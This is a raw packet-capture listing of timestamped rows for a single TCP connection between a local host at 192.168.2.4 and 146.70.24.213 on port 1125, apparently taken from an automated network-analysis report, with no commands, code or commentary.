Oct 11, 2024 16:53:47.696559906 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696573019 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696583033 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.696587086 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696602106 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696610928 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.696615934 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696630001 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696643114 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.696645021 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696660042 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696681976 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696690083 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.696696997 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696710110 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696712017 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.696724892 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696738005 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696739912 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.696752071 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696767092 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.696768045 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696789980 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.696789980 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696806908 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696820974 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696829081 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.696835041 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696855068 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696860075 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.696892977 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.697046041 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.697060108 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.697074890 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.697096109 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.697099924 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.697114944 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.697129011 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.697143078 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.697149992 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.697158098 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.697173119 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.697175026 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.697185040 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.697201014 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.697202921 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.697213888 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.697226048 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.697227001 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.697241068 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.697256088 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.697290897 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.781414986 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.781440020 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.781450033 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.781455040 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.781461954 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.781467915 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.781476974 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.781487942 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.781501055 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.781511068 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.781521082 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.781543016 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.781547070 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.781558990 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.781570911 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.781575918 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.781580925 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.781594992 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.781611919 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.781799078 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.781810045 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.781821012 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.781841040 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.781861067 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.781936884 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.781946898 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.781956911 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.781965971 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.781975985 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.781985044 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.781984091 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.781996965 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.782021046 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.782043934 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.782058954 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.782080889 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.782088995 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.782099962 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.782109022 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.782114983 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.782152891 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.785514116 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.785604000 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.785614014 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.785624981 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.785634041 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.785641909 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.785644054 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.785656929 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.785664082 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.785667896 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.785686016 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.785701036 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.785732031 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.785742998 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.785752058 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.785761118 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.785769939 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.785778999 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.785797119 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.785821915 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.785821915 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.785832882 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.785844088 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.785852909 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.785862923 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.785880089 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.785904884 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.785990000 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786036968 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786046982 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786072969 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.786076069 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786086082 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786118031 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.786149025 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786159039 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786169052 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786178112 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786187887 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786189079 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.786205053 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.786225080 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786235094 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786237001 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.786243916 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786253929 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786263943 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786267996 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.786273956 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786284924 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786295891 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786302090 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.786319017 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.786331892 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.786375999 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786386013 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786396027 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786403894 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786412954 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786418915 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.786422014 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786432981 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786442041 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786443949 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.786459923 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.786478043 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.786533117 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786542892 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786551952 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786566019 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786575079 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786575079 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.786586046 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786595106 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786596060 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.786611080 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786621094 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786628008 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.786629915 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786640882 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786648989 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786653996 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.786674023 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.786684036 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.786736012 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786746025 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786753893 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786762953 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786777020 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.786782026 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786792994 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786799908 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.786802053 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786814928 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786823988 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786830902 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.786834002 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786853075 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.786875010 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.786895037 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786905050 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786912918 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786921024 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786932945 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786935091 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.786956072 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786956072 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.786966085 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786977053 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786986113 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.786998034 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.787005901 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.787020922 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.787046909 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.787048101 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.787084103 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.787090063 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.787118912 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.787153959 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.787162066 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.787172079 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.787200928 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.787213087 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.787224054 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.787233114 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.787240982 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.787256956 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.787283897 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.787291050 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.787336111 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.787345886 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.787354946 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.787398100 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.787398100 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.787476063 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.787539005 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.787575960 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.787616968 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.787626982 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.787673950 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.875122070 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.875138998 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.875205994 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.875216961 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.875221968 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.875230074 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.875241041 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.875252008 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.875274897 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.875313997 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.875324011 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.875324965 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.875336885 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.875348091 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.875355005 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.875359058 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.875370979 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.875399113 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.875489950 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.875502110 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.875513077 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.875523090 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.875533104 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.875543118 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.875554085 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.875564098 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.875574112 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.875580072 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.875583887 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.875595093 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.875606060 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.875643969 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.875663042 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.875843048 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.875854015 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.875895023 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.876132011 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.876142025 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.876152992 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.876188993 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.876209021 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.876270056 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.876281023 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.876291037 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.876301050 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.876307011 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.876318932 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.876343012 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.876351118 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.876355886 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.876365900 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.876377106 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.876388073 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.876399040 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.876400948 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.876441956 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.876698017 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.876713037 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.876729965 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.876739979 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.876750946 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.876759052 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.876763105 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.876774073 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.876780033 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.876789093 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.876800060 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.876808882 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.876811028 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.876817942 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.876830101 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.876836061 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.876847982 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.876859903 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.876864910 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.876876116 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.876885891 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.876888037 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.876898050 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.876915932 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.876935005 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.876944065 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.876945972 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.876959085 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.876970053 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.876981974 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.876986027 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.876992941 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877003908 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877013922 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877022028 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.877029896 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877041101 CEST	1125	49730	146.70.24.213	192.168.2.4
